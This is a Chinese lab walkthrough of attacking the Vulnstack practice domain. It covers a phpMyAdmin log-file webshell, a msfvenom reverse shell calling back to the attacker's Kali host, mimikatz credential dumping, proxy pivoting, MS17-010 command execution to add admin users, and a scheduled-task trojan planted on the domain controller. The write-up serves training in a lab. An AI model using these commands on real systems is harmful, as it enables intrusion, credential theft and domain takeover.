红日内网Vulnstack靶机渗透一

一.环境

攻击机IP: Kali 192.168.161.129 

域内主机：Win2K3 Metasploitable IP 192.168.52.141

Win7 内网IP 192.168.52.143  IP 192.168.161.128

域控主机 Win2008 192.168.52.138

二 .渗透WEB服务器过程

1.信息收集

nmap扫描端口发现 80和3306端口开放

网站为apache  脚本语言为PHP

phpinfo.php

1. 网站真实ip

网站绝对路径

该项如果开启，则支持远程文件包含，如果有存在文件包含的文件则可直接getshell，或可以使用php伪协议 但关闭

无禁用函数

2.漏洞挖掘以及GETSHELL

Phpmyadmin 弱口令直接登进去

phpmyadmin后台getshell的常用手段有以下几种方式:
 

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

没有导入权限，无法用select into outfile方法写入shell,开启全局日志getshell利用全局变量general_log去getshell

SHOW GLOBAL VARIABLES LIKE ‘%general%’

日志记录功能关闭，但是可以开启

 set global general_log=on;# 开启日志  SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'# 设置日志位置为网站目录

我们直接写shell

select '<?php eval ($_POST[wenda]);?>'

执行这条语句之后，日志会将select后的查询语句记录进日志，从而让日志变成一个一句话木马 

 蚁剑连接

 刚好是administrator用户最高权限

三.内网渗透

 1.信息收集

 ipconfig /all   # 查看本机ip，所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 net share ipc$  # 开启ipc共享
 net share c$    # 开启c盘共享
 net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
 dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
 
 net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators    # 查看本地管理员组（通常会有域用户）
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "doamin controllers" /domain  # 查看域控制器（可能有多台）

收集的关键信息总结为

可知域控ip为192.168.52.138。

接下来我们在win7本地主机创建一个wenda用户，并加入到管理员组中

然后设法远程桌面登录，查看33是否开启：

netstat -ano | find "33"

如果没开启则利用以下命令来开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 远程连接失败 估计被防火墙隔离了

2.后渗透

1.msf上线
生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.161.129 LPORT=2333 -f exe > hack.exe 
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 2333
set lhost 192.168.161.129
exploit -j

上传hack.exe

然后运行 

由于是administrator用户，所以很容易变提权了

getuid查看服务器权限 getsystem 提权 getuid 查看是否提权成功

执行run post/windows/manage/enable_rdp模块来关闭防火墙，并使用rdesktop打开远程桌面

此时 33为open

​​​​​​​run post/windows/manage/enable_rdp

开启远程连接

抓取密码

先进行权限提升

privilege::debug

然后使用

sekurlsa::logonPasswords

得到密码 

此时我们已经获取到了administrator（域管理员）的明文密码接下来我们进一步渗透入内网，对域中的其他主机进行渗透

四.横向移动

我们用以下方法探测内网存活的主机

for /L %I in (1,1,2) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" 

  发现两台内网主机 192.168.52.138 192168.85.141

我们使用跳板攻击之: MSF 添加路由方式渗透内网 

run autoroute -s 192.168.52.0/24

扫描有效网卡的整个C段的信息以及查看路由添加情况

run autoroute -p

autoroute添加完路由后，还可以利用msf自带的sock4a模块进行Socks4a代理 但好像只有auxiliary/server/socks_proxy 

use auxiliary/server/socks_proxy
set srvport 1080 设置端口1080

run 运行

配置 kali socks代理

配置proxychains：版本为socks5 所以添加socks5

vi /etc/proxychains.conf

测试是否成功

proxychains curl 192.168.52.143
访问成功 说明 代理添加成功
Proxychains4 nmap -sT -Pn 192.168.52.143

这样内网主机win2003就可以通过vps与攻击机kali通信了，这里要知道，我们在msf上设置路由是为了让msf可以通信到内网其他主机；而我们设置代理是为了让攻击机上的其他工具可以通信到到内网的其他主机。

​​​​​​​

用nmap扫描win2003的33端口，发现其没有开启：

proxychains nmap -p 33 -Pn -sT 192.168.52.141 

 ps：socks4a的代理，只能使用tcp协议，socks5的代理，既支持tcp协议也支持udp协议，两者都不支持icmp协议和arp协议，所以nmap使用的时候要使用-sT选择使用tcp协议，还要使用-Pn不使用ICMP的ping；一定要先运行socks再添加路由

开放了445端口可以用MS17_010（永恒之蓝）攻击试一下

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS 192.168.52.141

exploit

 存在ms17_010漏洞，尝试攻击获得shell，失败

我们用auxiliary/admin/smb/ms17_010_command模块执行命令将其开启

set RHOSTS 192.168.52.141
set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
run

但还是失败了 再换一个模块

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user hack qaz@123

set RHOST 192.168.52.141

exploit

成功执行命令

然后把添加的用户加入管理员组 

set COMMAND net localgroup administrators hack /add

试着打开telnet服务

set COMMAND sc config tlntsvr start= auto
set COMMAND net start telnet
set COMMAND netstat -an

开启成功后接下来telnet连接 

use auxiliary/scanner/telnet/telnet_login

set RHOSTS 192.168.52.141

set username hack

set PASSWORD qaz@123
run

 成功建立会话 

成功拿下192.168.52.141这台域成员主机 

五.杀入域控

 还是使用渗透192.168.52.141主机的方法来渗透 192.168.52.138

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user hack qaz@123 /add

set COMMAND net localgroup administrators hack /add 

 但是发现开启telnet服务失败 估计没装这个服务 ，先把防火墙关了

set COMMAND netsh advfirewall set allprofiles state off

试着开启33服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

尝试开启却失败只能换一种思路，我们这里通过win7在域控上面上传一个msf马。

先用win7连接域控的c盘共享

net use \\192.168.52.138\c$ "Xwl625398@" /user:"administrator"

将win7主机上的shell.exe上传到域控上 

copy c:\phpstudy\www\yxcms\shell.exe \\192.168.52.138\c$

设置一个任务计划，定时启动木马之后就能够获取域控的shell了 

shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System  /u administrator /p "Xwl625398@"

再换种方法，转战cs 

六.清除日志 痕迹

七.总结